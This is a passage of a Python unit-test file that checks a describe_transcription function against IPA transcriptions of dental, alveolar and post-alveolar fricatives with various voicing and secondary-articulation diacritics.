def test_ðˤ_is_the_representation_of_the_voiced_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðˤ")
self.assertEqual(actual, expected)
def test_θ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ˤ")
self.assertEqual(actual, expected)
def test_θ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated dental fricative pulmonic egressive consonant
def test_ðʰ_is_the_representation_of_the_voiced_aspirated_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðʰ")
self.assertEqual(actual, expected)
def test_ð̬ʰ_is_the_representation_of_the_voiced_aspirated_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̬ʰ")
self.assertEqual(actual, expected)
def test_θ̬ʰ_is_the_representation_of_the_voiced_aspirated_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized dental fricative pulmonic egressive consonant
def test_ðʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðʰʷ")
self.assertEqual(actual, expected)
def test_ð̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̬ʰʷ")
self.assertEqual(actual, expected)
def test_θ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized dental fricative pulmonic egressive consonant
def test_ðʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðʰʲ")
self.assertEqual(actual, expected)
def test_ð̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̬ʰʲ")
self.assertEqual(actual, expected)
def test_θ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized dental fricative pulmonic egressive consonant
def test_ðʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðʰˠ")
self.assertEqual(actual, expected)
def test_ð̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̬ʰˠ")
self.assertEqual(actual, expected)
def test_θ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized dental fricative pulmonic egressive consonant
def test_ðʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðʰˤ")
self.assertEqual(actual, expected)
def test_ð̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̬ʰˤ")
self.assertEqual(actual, expected)
def test_θ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless alveolar fricative pulmonic egressive consonant
def test_s_is_the_representation_of_the_voiceless_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s")
self.assertEqual(actual, expected)
def test_s̊_is_the_representation_of_the_voiceless_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̊")
self.assertEqual(actual, expected)
def test_s̥_is_the_representation_of_the_voiceless_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̥")
self.assertEqual(actual, expected)
def test_z̊_is_the_representation_of_the_voiceless_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊")
self.assertEqual(actual, expected)
def test_z̥_is_the_representation_of_the_voiceless_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥")
self.assertEqual(actual, expected)
# voiceless labialized alveolar fricative pulmonic egressive consonant
def test_sʷ_is_the_representation_of_the_voiceless_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sʷ")
self.assertEqual(actual, expected)
def test_s̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̊ʷ")
self.assertEqual(actual, expected)
def test_s̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̥ʷ")
self.assertEqual(actual, expected)
def test_z̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ʷ")
self.assertEqual(actual, expected)
def test_z̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized alveolar fricative pulmonic egressive consonant
def test_sʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sʲ")
self.assertEqual(actual, expected)
def test_s̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̊ʲ")
self.assertEqual(actual, expected)
def test_s̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̥ʲ")
self.assertEqual(actual, expected)
def test_z̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ʲ")
self.assertEqual(actual, expected)
def test_z̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized alveolar fricative pulmonic egressive consonant
def test_sˠ_is_the_representation_of_the_voiceless_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sˠ")
self.assertEqual(actual, expected)
def test_s̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̊ˠ")
self.assertEqual(actual, expected)
def test_s̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̥ˠ")
self.assertEqual(actual, expected)
def test_z̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ˠ")
self.assertEqual(actual, expected)
def test_z̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized alveolar fricative pulmonic egressive consonant
def test_sˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sˤ")
self.assertEqual(actual, expected)
def test_s̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̊ˤ")
self.assertEqual(actual, expected)
def test_s̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̥ˤ")
self.assertEqual(actual, expected)
def test_z̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ˤ")
self.assertEqual(actual, expected)
def test_z̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated alveolar fricative pulmonic egressive consonant
def test_sʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sʰ")
self.assertEqual(actual, expected)
def test_z̥ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ʰ")
self.assertEqual(actual, expected)
def test_z̊ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized alveolar fricative pulmonic egressive consonant
def test_sʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sʰʷ")
self.assertEqual(actual, expected)
def test_z̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ʰʷ")
self.assertEqual(actual, expected)
def test_z̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized alveolar fricative pulmonic egressive consonant
def test_sʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sʰʲ")
self.assertEqual(actual, expected)
def test_z̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ʰʲ")
self.assertEqual(actual, expected)
def test_z̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized alveolar fricative pulmonic egressive consonant
def test_sʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sʰˠ")
self.assertEqual(actual, expected)
def test_z̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ʰˠ")
self.assertEqual(actual, expected)
def test_z̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized alveolar fricative pulmonic egressive consonant
def test_sʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sʰˤ")
self.assertEqual(actual, expected)
def test_z̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ʰˤ")
self.assertEqual(actual, expected)
def test_z̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ʰˤ")
self.assertEqual(actual, expected)
# voiced alveolar fricative pulmonic egressive consonant
def test_z_is_the_representation_of_the_voiced_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z")
self.assertEqual(actual, expected)
def test_s̬_is_the_representation_of_the_voiced_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬")
self.assertEqual(actual, expected)
def test_s̬_is_the_representation_of_the_voiced_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬")
self.assertEqual(actual, expected)
# voiced labialized alveolar fricative pulmonic egressive consonant
def test_zʷ_is_the_representation_of_the_voiced_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zʷ")
self.assertEqual(actual, expected)
def test_s̬ʷ_is_the_representation_of_the_voiced_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ʷ")
self.assertEqual(actual, expected)
def test_s̬ʷ_is_the_representation_of_the_voiced_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized alveolar fricative pulmonic egressive consonant
def test_zʲ_is_the_representation_of_the_voiced_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zʲ")
self.assertEqual(actual, expected)
def test_s̬ʲ_is_the_representation_of_the_voiced_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ʲ")
self.assertEqual(actual, expected)
def test_s̬ʲ_is_the_representation_of_the_voiced_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized alveolar fricative pulmonic egressive consonant
def test_zˠ_is_the_representation_of_the_voiced_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zˠ")
self.assertEqual(actual, expected)
def test_s̬ˠ_is_the_representation_of_the_voiced_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ˠ")
self.assertEqual(actual, expected)
def test_s̬ˠ_is_the_representation_of_the_voiced_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized alveolar fricative pulmonic egressive consonant
def test_zˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zˤ")
self.assertEqual(actual, expected)
def test_s̬ˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ˤ")
self.assertEqual(actual, expected)
def test_s̬ˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated alveolar fricative pulmonic egressive consonant
def test_zʰ_is_the_representation_of_the_voiced_aspirated_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zʰ")
self.assertEqual(actual, expected)
def test_z̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̬ʰ")
self.assertEqual(actual, expected)
def test_s̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized alveolar fricative pulmonic egressive consonant
def test_zʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zʰʷ")
self.assertEqual(actual, expected)
def test_z̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̬ʰʷ")
self.assertEqual(actual, expected)
def test_s̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized alveolar fricative pulmonic egressive consonant
def test_zʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zʰʲ")
self.assertEqual(actual, expected)
def test_z̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̬ʰʲ")
self.assertEqual(actual, expected)
def test_s̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized alveolar fricative pulmonic egressive consonant
def test_zʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zʰˠ")
self.assertEqual(actual, expected)
def test_z̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̬ʰˠ")
self.assertEqual(actual, expected)
def test_s̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized alveolar fricative pulmonic egressive consonant
def test_zʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zʰˤ")
self.assertEqual(actual, expected)
def test_z̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̬ʰˤ")
self.assertEqual(actual, expected)
def test_s̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless post-alveolar fricative pulmonic egressive consonant
def test_ʃ_is_the_representation_of_the_voiceless_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ")
self.assertEqual(actual, expected)
def test_ʃ̊_is_the_representation_of_the_voiceless_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̊")
self.assertEqual(actual, expected)
def test_ʃ̥_is_the_representation_of_the_voiceless_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̥")
self.assertEqual(actual, expected)
def test_ʒ̊_is_the_representation_of_the_voiceless_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊")
self.assertEqual(actual, expected)
def test_ʒ̥_is_the_representation_of_the_voiceless_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥")
self.assertEqual(actual, expected)
# voiceless labialized post-alveolar fricative pulmonic egressive consonant
def test_ʃʷ_is_the_representation_of_the_voiceless_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃʷ")
self.assertEqual(actual, expected)
def test_ʃ̊ʷ_is_the_representation_of_the_voiceless_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̊ʷ")
self.assertEqual(actual, expected)
def test_ʃ̥ʷ_is_the_representation_of_the_voiceless_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̥ʷ")
self.assertEqual(actual, expected)
def test_ʒ̊ʷ_is_the_representation_of_the_voiceless_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ʷ")
self.assertEqual(actual, expected)
def test_ʒ̥ʷ_is_the_representation_of_the_voiceless_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized post-alveolar fricative pulmonic egressive consonant
def test_ʃʲ_is_the_representation_of_the_voiceless_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃʲ")
self.assertEqual(actual, expected)
def test_ʃ̊ʲ_is_the_representation_of_the_voiceless_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̊ʲ")
self.assertEqual(actual, expected)
def test_ʃ̥ʲ_is_the_representation_of_the_voiceless_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̥ʲ")
self.assertEqual(actual, expected)
def test_ʒ̊ʲ_is_the_representation_of_the_voiceless_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ʲ")
self.assertEqual(actual, expected)
def test_ʒ̥ʲ_is_the_representation_of_the_voiceless_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized post-alveolar fricative pulmonic egressive consonant
def test_ʃˠ_is_the_representation_of_the_voiceless_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃˠ")
self.assertEqual(actual, expected)
def test_ʃ̊ˠ_is_the_representation_of_the_voiceless_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̊ˠ")
self.assertEqual(actual, expected)
def test_ʃ̥ˠ_is_the_representation_of_the_voiceless_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̥ˠ")
self.assertEqual(actual, expected)
def test_ʒ̊ˠ_is_the_representation_of_the_voiceless_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ˠ")
self.assertEqual(actual, expected)
def test_ʒ̥ˠ_is_the_representation_of_the_voiceless_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized post-alveolar fricative pulmonic egressive consonant
def test_ʃˤ_is_the_representation_of_the_voiceless_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃˤ")
self.assertEqual(actual, expected)
def test_ʃ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̊ˤ")
self.assertEqual(actual, expected)
def test_ʃ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̥ˤ")
self.assertEqual(actual, expected)
def test_ʒ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ˤ")
self.assertEqual(actual, expected)
def test_ʒ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
